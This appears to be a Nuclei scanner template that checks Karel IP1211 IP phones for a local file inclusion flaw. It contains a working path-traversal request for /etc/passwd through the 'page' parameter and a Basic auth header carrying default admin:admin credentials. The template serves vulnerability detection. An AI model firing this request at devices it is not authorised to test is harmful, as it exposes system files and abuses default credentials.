38 lines
1.2 KiB
YAML
38 lines
1.2 KiB
YAML
id: karel-ip-phone-lfi
|
|
|
|
info:
|
|
name: Karel IP Phone IP1211 Web Management Panel - Local File Inclusion
|
|
author: 0x_Akoko
|
|
severity: high
|
|
description: Karel IP Phone IP1211 Web Management Panel is vulnerable to local file inclusion and can allow remote attackers to access arbitrary files stored on the remote device via the 'cgiServer.exx' endpoint and the 'page' parameter.
|
|
reference:
|
|
- https://cxsecurity.com/issue/WLB-2020100038
|
|
- https://www.karel.com.tr/urun-cozum/ip1211-ip-telefon
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
metadata:
|
|
max-request: 1
|
|
tags: karel,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd"
|
|
|
|
headers:
|
|
Authorization: Basic YWRtaW46YWRtaW4=
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: regex
|
|
regex:
|
|
- "root:[x*]:0:0"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4a0a00473045022100907dfeb3fa4c96d27022841cc4c95e35fa9993029897eacc8ec90dab391d734002202526a520a8b87fd6385d3406a8d2798d261407e4310998df18d83cb27ca5242b:922c64590222798bb761d5b6d8e72950
|